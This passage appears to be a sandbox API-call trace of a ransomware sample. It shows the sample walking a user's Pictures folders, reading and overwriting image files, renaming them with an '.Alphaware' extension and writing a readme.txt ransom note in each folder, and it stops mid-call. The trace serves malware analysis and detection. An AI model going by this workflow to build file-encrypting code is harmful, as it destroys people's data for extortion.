ftLastAccessTime.dwLowDateTime=0xea0aa8b0, ftLastAccessTime.dwHighDateTime=0x1d973cc, ftLastWriteTime.dwLowDateTime=0xea0aa8b0, ftLastWriteTime.dwHighDateTime=0x1d973cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vmOQizT54", cAlternateFileName="VMOQIZ~1")) returned 1 [0086.340] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0086.340] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0086.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0086.340] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0086.340] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0086.340] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3ca3f90, ftCreationTime.dwHighDateTime=0x1d96f85, ftLastAccessTime.dwLowDateTime=0xea0aa8b0, ftLastAccessTime.dwHighDateTime=0x1d973cc, ftLastWriteTime.dwLowDateTime=0xea0aa8b0, ftLastWriteTime.dwHighDateTime=0x1d973cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.340] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b0c780, ftCreationTime.dwHighDateTime=0x1d971f6, ftLastAccessTime.dwLowDateTime=0x2c77cf80, ftLastAccessTime.dwHighDateTime=0x1d97516, ftLastWriteTime.dwLowDateTime=0x2c77cf80, ftLastWriteTime.dwHighDateTime=0x1d97516, nFileSizeHigh=0x0, nFileSizeLow=0x46de, dwReserved0=0x0, dwReserved1=0x0, cFileName="IaDqH9.jpg", cAlternateFileName="")) returned 1 [0086.341] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf5ab4c0, ftCreationTime.dwHighDateTime=0x1d966a3, ftLastAccessTime.dwLowDateTime=0xd266c9a0, ftLastAccessTime.dwHighDateTime=0x1d97070, ftLastWriteTime.dwLowDateTime=0xd266c9a0, ftLastWriteTime.dwHighDateTime=0x1d97070, nFileSizeHigh=0x0, nFileSizeLow=0x16d07, dwReserved0=0x0, dwReserved1=0x0, cFileName="vwNeKxlo1w35_GTiy.png", cAlternateFileName="VWNEKX~1.PNG")) returned 1 [0086.341] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0086.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0086.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0086.341] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\IaDqH9.jpg", dwFileAttributes=0x80) returned 1 [0086.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e778) returned 1 [0086.341] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\IaDqH9.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\vmoqizt54\\iadqh9.jpg"), fInfoLevelId=0x0, lpFileInformation=0x241d8f8 | out: lpFileInformation=0x241d8f8*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x32b0c780, ftCreationTime.dwHighDateTime=0x1d971f6, ftLastAccessTime.dwLowDateTime=0x2c77cf80, ftLastAccessTime.dwHighDateTime=0x1d97516, ftLastWriteTime.dwLowDateTime=0x2c77cf80, ftLastWriteTime.dwHighDateTime=0x1d97516, nFileSizeHigh=0x0, nFileSizeLow=0x46de)) returned 1 [0086.341] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e728) returned 1 [0086.341] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e808) returned 1 [0086.341] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\IaDqH9.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\vmoqizt54\\iadqh9.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.342] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e778) returned 1 [0086.342] ReadFile (in: hFile=0x254, lpBuffer=0x241dba0, nNumberOfBytesToRead=0x46de, lpNumberOfBytesRead=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x241dba0*, lpNumberOfBytesRead=0x23e8b8*=0x46de, lpOverlapped=0x0) returned 1 [0086.360] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e738) returned 1 [0086.360] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\IaDqH9.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\vmoqizt54\\iadqh9.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.362] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6a8) returned 1 [0086.363] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6a8) returned 1 [0086.363] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\IaDqH9.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\vmoqizt54\\iadqh9.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23e9d0 | out: lpFileInformation=0x23e9d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b0c780, ftCreationTime.dwHighDateTime=0x1d971f6, ftLastAccessTime.dwLowDateTime=0x2c77cf80, ftLastAccessTime.dwHighDateTime=0x1d97516, ftLastWriteTime.dwLowDateTime=0x85ab9be0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5f48)) returned 1 [0086.363] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e658) returned 1 [0086.363] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\IaDqH9.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\vmoqizt54\\iadqh9.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\IaDqH9.jpg.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\vmoqizt54\\iadqh9.jpg.alphaware")) returned 1 [0086.364] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7c8) returned 1 [0086.376] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\vmoqizt54\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e738) returned 1 [0086.382] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\vwNeKxlo1w35_GTiy.png", dwFileAttributes=0x80) returned 1 [0086.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e778) returned 1 [0086.382] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\vwNeKxlo1w35_GTiy.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\vmoqizt54\\vwnekxlo1w35_gtiy.png"), fInfoLevelId=0x0, lpFileInformation=0x24e7580 | out: lpFileInformation=0x24e7580*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xaf5ab4c0, ftCreationTime.dwHighDateTime=0x1d966a3, ftLastAccessTime.dwLowDateTime=0xd266c9a0, ftLastAccessTime.dwHighDateTime=0x1d97070, ftLastWriteTime.dwLowDateTime=0xd266c9a0, ftLastWriteTime.dwHighDateTime=0x1d97070, nFileSizeHigh=0x0, nFileSizeLow=0x16d07)) returned 1 [0086.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e728) returned 1 [0086.383] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e808) returned 1 [0086.383] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\vwNeKxlo1w35_GTiy.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\vmoqizt54\\vwnekxlo1w35_gtiy.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.383] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e778) returned 1 [0086.383] ReadFile (in: hFile=0x254, lpBuffer=0x126d0090, nNumberOfBytesToRead=0x16d07, lpNumberOfBytesRead=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x126d0090*, lpNumberOfBytesRead=0x23e8b8*=0x16d07, lpOverlapped=0x0) returned 1 [0086.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e738) returned 1 [0086.417] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\vwNeKxlo1w35_GTiy.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\vmoqizt54\\vwnekxlo1w35_gtiy.png"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.419] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6a8) returned 1 [0086.422] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e6a8) returned 1 [0086.422] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\vwNeKxlo1w35_GTiy.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\vmoqizt54\\vwnekxlo1w35_gtiy.png"), fInfoLevelId=0x0, lpFileInformation=0x23e9d0 | out: lpFileInformation=0x23e9d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf5ab4c0, ftCreationTime.dwHighDateTime=0x1d966a3, ftLastAccessTime.dwLowDateTime=0xd266c9a0, ftLastAccessTime.dwHighDateTime=0x1d97070, ftLastWriteTime.dwLowDateTime=0x85b52160, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1e788)) returned 1 [0086.422] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e658) returned 1 [0086.422] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\vwNeKxlo1w35_GTiy.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\vmoqizt54\\vwnekxlo1w35_gtiy.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NQCf5ew\\vmOQizT54\\vwNeKxlo1w35_GTiy.png.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqcf5ew\\vmoqizt54\\vwnekxlo1w35_gtiy.png.alphaware")) returned 1 [0086.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9b8) returned 1 [0086.423] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb3ca3f90, ftCreationTime.dwHighDateTime=0x1d96f85, ftLastAccessTime.dwLowDateTime=0x85b52160, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85b52160, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.423] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b0c780, ftCreationTime.dwHighDateTime=0x1d971f6, ftLastAccessTime.dwLowDateTime=0x2c77cf80, ftLastAccessTime.dwHighDateTime=0x1d97516, ftLastWriteTime.dwLowDateTime=0x85ab9be0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x5f48, dwReserved0=0x0, dwReserved1=0x0, cFileName="IaDqH9.jpg.Alphaware", cAlternateFileName="IADQH9~1.ALP")) returned 1 [0086.423] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85adfd40, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x85adfd40, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x85b05ea0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0086.424] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf5ab4c0, ftCreationTime.dwHighDateTime=0x1d966a3, ftLastAccessTime.dwLowDateTime=0xd266c9a0, ftLastAccessTime.dwHighDateTime=0x1d97070, ftLastWriteTime.dwLowDateTime=0x85b52160, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1e788, dwReserved0=0x0, dwReserved1=0x0, cFileName="vwNeKxlo1w35_GTiy.png.Alphaware", cAlternateFileName="VWNEKX~1.ALP")) returned 1 [0086.424] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e790 | out: lpFindFileData=0x23e790*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf5ab4c0, ftCreationTime.dwHighDateTime=0x1d966a3, ftLastAccessTime.dwLowDateTime=0xd266c9a0, ftLastAccessTime.dwHighDateTime=0x1d97070, ftLastWriteTime.dwLowDateTime=0x85b52160, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1e788, dwReserved0=0x0, dwReserved1=0x0, cFileName="vwNeKxlo1w35_GTiy.png.Alphaware", cAlternateFileName="VWNEKX~1.ALP")) returned 0 [0086.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6b8) returned 1 [0086.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e8d8) returned 1 [0086.424] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23ea58) returned 1 [0086.424] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbfed4280, ftCreationTime.dwHighDateTime=0x1d96df6, ftLastAccessTime.dwLowDateTime=0x6378c160, ftLastAccessTime.dwHighDateTime=0x1d96f08, ftLastWriteTime.dwLowDateTime=0x6378c160, ftLastWriteTime.dwHighDateTime=0x1d96f08, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0086.424] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51bdcf20, ftCreationTime.dwHighDateTime=0x1d96787, ftLastAccessTime.dwLowDateTime=0xd4ceaf70, ftLastAccessTime.dwHighDateTime=0x1d96ddf, ftLastWriteTime.dwLowDateTime=0xd4ceaf70, ftLastWriteTime.dwHighDateTime=0x1d96ddf, nFileSizeHigh=0x0, nFileSizeLow=0xfca3, dwReserved0=0x0, dwReserved1=0x0, cFileName="H-iXHNw3Q.jpg", cAlternateFileName="H-IXHN~1.JPG")) returned 1 [0086.424] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70196930, ftCreationTime.dwHighDateTime=0x1d9676d, ftLastAccessTime.dwLowDateTime=0x4f1b01a0, ftLastAccessTime.dwHighDateTime=0x1d96e96, ftLastWriteTime.dwLowDateTime=0x4f1b01a0, ftLastWriteTime.dwHighDateTime=0x1d96e96, nFileSizeHigh=0x0, nFileSizeLow=0x1a8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="WsNjcAtuTT8n1nv.gif", cAlternateFileName="WSNJCA~1.GIF")) returned 1 [0086.424] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e830 | out: lpFindFileData=0x23e830*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0086.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e758) returned 1 [0086.424] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e978) returned 1 [0086.424] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\H-iXHNw3Q.jpg", dwFileAttributes=0x80) returned 1 [0086.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0086.425] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\H-iXHNw3Q.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqr9nqmjn0 i\\h-ixhnw3q.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23fef28 | out: lpFileInformation=0x23fef28*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x51bdcf20, ftCreationTime.dwHighDateTime=0x1d96787, ftLastAccessTime.dwLowDateTime=0xd4ceaf70, ftLastAccessTime.dwHighDateTime=0x1d96ddf, ftLastWriteTime.dwLowDateTime=0xd4ceaf70, ftLastWriteTime.dwHighDateTime=0x1d96ddf, nFileSizeHigh=0x0, nFileSizeLow=0xfca3)) returned 1 [0086.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0086.425] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0086.425] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\H-iXHNw3Q.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqr9nqmjn0 i\\h-ixhnw3q.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.425] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0086.425] ReadFile (in: hFile=0x254, lpBuffer=0x23ff1e8, nNumberOfBytesToRead=0xfca3, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x23ff1e8*, lpNumberOfBytesRead=0x23e958*=0xfca3, lpOverlapped=0x0) returned 1 [0086.446] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0086.446] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\H-iXHNw3Q.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqr9nqmjn0 i\\h-ixhnw3q.jpg"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.447] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0086.450] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e748) returned 1 [0086.450] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\H-iXHNw3Q.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqr9nqmjn0 i\\h-ixhnw3q.jpg"), fInfoLevelId=0x0, lpFileInformation=0x23ea70 | out: lpFileInformation=0x23ea70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51bdcf20, ftCreationTime.dwHighDateTime=0x1d96787, ftLastAccessTime.dwLowDateTime=0xd4ceaf70, ftLastAccessTime.dwHighDateTime=0x1d96ddf, ftLastWriteTime.dwLowDateTime=0x85b9e420, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x151b4)) returned 1 [0086.450] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e6f8) returned 1 [0086.450] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\H-iXHNw3Q.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqr9nqmjn0 i\\h-ixhnw3q.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\H-iXHNw3Q.jpg.Alphaware" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqr9nqmjn0 i\\h-ixhnw3q.jpg.alphaware")) returned 1 [0086.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e868) returned 1 [0086.453] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqr9nqmjn0 i\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.467] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7d8) returned 1 [0086.468] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\WsNjcAtuTT8n1nv.gif", dwFileAttributes=0x80) returned 1 [0086.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e818) returned 1 [0086.469] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\WsNjcAtuTT8n1nv.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqr9nqmjn0 i\\wsnjcatutt8n1nv.gif"), fInfoLevelId=0x0, lpFileInformation=0x24c0668 | out: lpFileInformation=0x24c0668*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x70196930, ftCreationTime.dwHighDateTime=0x1d9676d, ftLastAccessTime.dwLowDateTime=0x4f1b01a0, ftLastAccessTime.dwHighDateTime=0x1d96e96, ftLastWriteTime.dwLowDateTime=0x4f1b01a0, ftLastWriteTime.dwHighDateTime=0x1d96e96, nFileSizeHigh=0x0, nFileSizeLow=0x1a8a)) returned 1 [0086.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e7c8) returned 1 [0086.469] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e8a8) returned 1 [0086.469] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\WsNjcAtuTT8n1nv.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqr9nqmjn0 i\\wsnjcatutt8n1nv.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0086.469] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e818) returned 1 [0086.469] ReadFile (in: hFile=0x254, lpBuffer=0x24c0928, nNumberOfBytesToRead=0x1a8a, lpNumberOfBytesRead=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x24c0928*, lpNumberOfBytesRead=0x23e958*=0x1a8a, lpOverlapped=0x0) returned 1 [0086.566] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\WsNjcAtuTT8n1nv.gif", nBufferLength=0x105, lpBuffer=0x23e2c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\WsNjcAtuTT8n1nv.gif", lpFilePart=0x0) returned 0x4d [0086.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e7d8) returned 1 [0086.566] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sD_Mf\\e4W8iO-jmf\\NqR9nQMJn0 I\\WsNjcAtuTT8n1nv.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\sd_mf\\e4w8io-jmf\\nqr9nqmjn0 i\\wsnjcatutt8n1nv.gif"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0086.568] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e748) returned 1 [0086.570] WriteFile (in: hFile=0x254, lpBuffer=0x254f910*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e8b8, lpOverlapped=0x0 | out: lpBuffer=0x254f910*, lpNumberOfBytesWritten=0x23e8b8*=0x1000, lpOverlapped=0x0) returned 1 [0086.572] GetFullPathNameW (in: 